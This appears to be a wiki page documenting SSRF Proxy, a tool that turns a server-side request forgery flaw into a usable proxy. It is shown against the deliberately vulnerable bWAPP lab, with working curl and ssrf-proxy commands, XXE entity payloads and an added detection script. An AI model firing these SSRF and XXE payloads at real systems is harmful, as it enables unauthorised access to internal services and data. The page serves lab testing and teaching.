Configuration Examples

Brendan Coles edited this page May 30, 2016 · 1 revision

The following examples make use of bWAPP bee-box as an example application vulnerable to SSRF.


Basic Configuration

bWAPP is deliberately vulnerable to SSRF. The following will cause the bWAPP application to request http://example.local/ via SSRF:

curl "http://bwapp.local/bWAPP/rlfi.php?ip=&language=http://example.local/" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0"

To use this SSRF with SSRF Proxy the URL and cookie must be supplied. The xxURLxx placeholder must also be specified. For example:

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0"

The xxURLxx placeholder exists within the query string. As such, all client requests must be URL encoded. This can be achieved by specifying the urlencode rule with --rules.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --rules urlencode
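
Why the encoding matters, as an added example (not part of SSRF Proxy or the original page): the Ruby sketch below substitutes a client URL into the template above with and without percent-encoding, then parses the result the way a server-side form parser would. The client URL and the helper names are assumptions made for illustration.

```ruby
require 'uri'

# Template from the page; CLIENT_URL is a constructed sample request.
TEMPLATE   = 'http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx'
CLIENT_URL = 'http://example.local/search?q=test&page=2'

# Replace the placeholder, optionally percent-encoding the client URL
# (the effect the page attributes to the urlencode rule).
def substitute(url, encode:)
  value = encode ? URI.encode_www_form_component(url) : url
  TEMPLATE.sub('xxURLxx') { value }
end

# Parse the query string as the receiving application's form parser would.
def server_params(request_url)
  query = request_url.split('?', 2)[1].to_s
  URI.decode_www_form(query).to_h
end

# Parameters seen by the server for the raw and the encoded substitution.
def compare(url)
  { raw: server_params(substitute(url, encode: false)),
    encoded: server_params(substitute(url, encode: true)) }
end

if __FILE__ == $PROGRAM_NAME
  compare(CLIENT_URL).each { |mode, params| puts "#{mode}: #{params.inspect}" }
end
```

Without encoding, the `&` in the client URL ends the language parameter early and the remainder arrives as a separate page parameter; with encoding, the whole URL reaches language intact.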

This configuration is sufficient to use the SSRF as a proxy; however, effective use of the request and response modification options will yield more accurate results.


Debugging

The verbose -v and debug -d options may be useful while configuring SSRF Proxy.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --rules urlencode \
  -v -d

Requests can also be routed through an intercepting HTTP proxy such as Burp with --proxy=PROXY:

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --rules urlencode \
  -v -d \
  --proxy "http://127.0.0.1:8080"

Response Modification

The relevant response can be extracted by specifying a regex to match with the --match option:

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --rules urlencode \
  --match "</form>\s*<br />\s*(.+)\s*</div>\s*<div id=\"side\">"

bee-box has PHP errors enabled by default. The --guess-status option checks for common application error messages in the response to infer the appropriate HTTP response status code and message.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --rules urlencode \
  --match "</form>\s*<br />\s*(.+)\s*</div>\s*<div id=\"side\">" \
  --guess-status

The --guess-mime option attempts to guess the response content type and set the appropriate Content-Type header. The content type is determined by the file extension of the request URI.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --rules urlencode \
  --match "</form>\s*<br />\s*(.+)\s*</div>\s*<div id=\"side\">" \
  --guess-mime

The --strip=HEADERS option removes the specified HTTP headers from the response. This can be useful to remove inappropriate or undesirable headers such as content-disposition, set-cookie and transfer-encoding.


Request Modification

Several options exist to modify client HTTP requests.

The --forward-cookies option can be used when the SSRF allows forwarding cookies. This option merges all cookies from the client request with the cookie specified in --cookie (if any).

The --body-to-uri option moves the HTTP request body to the query string. This can be useful when the client requests are directed at a third-party application which allows parameters in either the query string or the request body. In this way it is possible to communicate with the target application.

The --auth-to-uri option checks for HTTP Basic credentials in the Authorization client request header and adds them to the request. This can be useful when the SSRF allows sending credentials in the URI, such as http://[user:pass]@host/.


XXE

bWAPP is deliberately vulnerable to XXE, which permits blind SSRF. The following will cause the bWAPP application to request http://example.local/ via SSRF:

curl "http://bwapp.local/bWAPP/xxe-2.php" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  -X POST \
  --data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "http://example.local/"> ]><reset><login>&url;</login></reset>'

To use this XXE with SSRF Proxy the URL, cookie and POST data must be supplied. The xxURLxx placeholder must also be specified. For example:

ssrf-proxy -u "http://bwapp.local/bWAPP/xxe-2.php" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --method POST \
  --post-data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "xxURLxx"> ]><reset><login>&url;</login></reset>'

The xxURLxx placeholder exists within the request body. As such, all client requests must be URL encoded. This can be achieved by specifying the urlencode rule with --rules.

ssrf-proxy -u "http://bwapp.local/bWAPP/xxe-2.php" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --method POST \
  --post-data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "xxURLxx"> ]><reset><login>&url;</login></reset>' \
  --rules urlencode

bee-box has PHP errors enabled by default. The --guess-status option checks for common application error messages in the response to infer the appropriate HTTP response status code and message.

ssrf-proxy -u "http://bwapp.local/bWAPP/xxe-2.php" \
  --cookie "PHPSESSID=<valid cookie>; security_level=0" \
  --method POST \
  --post-data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "xxURLxx"> ]><reset><login>&url;</login></reset>' \
  --rules urlencode \
  --guess-status
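
Both request shapes used on this page, a URL carried in a query parameter and an external entity declared in a POST body, are recognisable in captured traffic. The following Ruby sketch is an added example, not part of SSRF Proxy or bWAPP; the record layout (target, body), the helper names and the sample records are assumptions, and it presumes request bodies are captured already decoded by a WAF or reverse proxy.

```ruby
require 'uri'

# Parameter value that is itself an absolute URL (http, https, file, gopher, ...).
URL_VALUE = %r{\A[a-z][a-z0-9+.\-]*://}i
# DOCTYPE declaring a general or parameter entity with an external identifier.
EXTERNAL_ENTITY = /<!ENTITY\s+(?:%\s+)?[\w.\-]+\s+(?:SYSTEM|PUBLIC)\s+["']/i

# Names of query parameters whose decoded value is an absolute URL.
def url_params(target)
  query = target.split('?', 2)[1].to_s
  URI.decode_www_form(query).select { |_, v| v.match?(URL_VALUE) }.map(&:first)
rescue ArgumentError # malformed percent-encoding in the query string
  []
end

# Findings for one request record of the form { target:, body: }.
def findings(req)
  out = url_params(req[:target]).map { |name| "url-in-param:#{name}" }
  out << 'external-entity-in-body' if req[:body].to_s.match?(EXTERNAL_ENTITY)
  out
end

# Constructed request records, shaped like the requests shown on this page.
SAMPLES = [
  { target: '/bWAPP/rlfi.php?ip=&language=http%3A%2F%2Fexample.local%2F', body: nil },
  { target: '/bWAPP/rlfi.php?ip=&language=lang_en.php', body: nil },
  { target: '/bWAPP/xxe-2.php',
    body: '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "http://example.local/"> ]>' \
          '<reset><login>&url;</login></reset>' },
  { target: '/bWAPP/xxe-2.php', body: '<reset><login>bee</login></reset>' }
].freeze

# One list of findings per record, in input order.
def scan(records)
  records.map { |r| findings(r) }
end

if __FILE__ == $PROGRAM_NAME
  SAMPLES.zip(scan(SAMPLES)).each { |req, hits| puts "#{req[:target]} => #{hits.inspect}" }
end
```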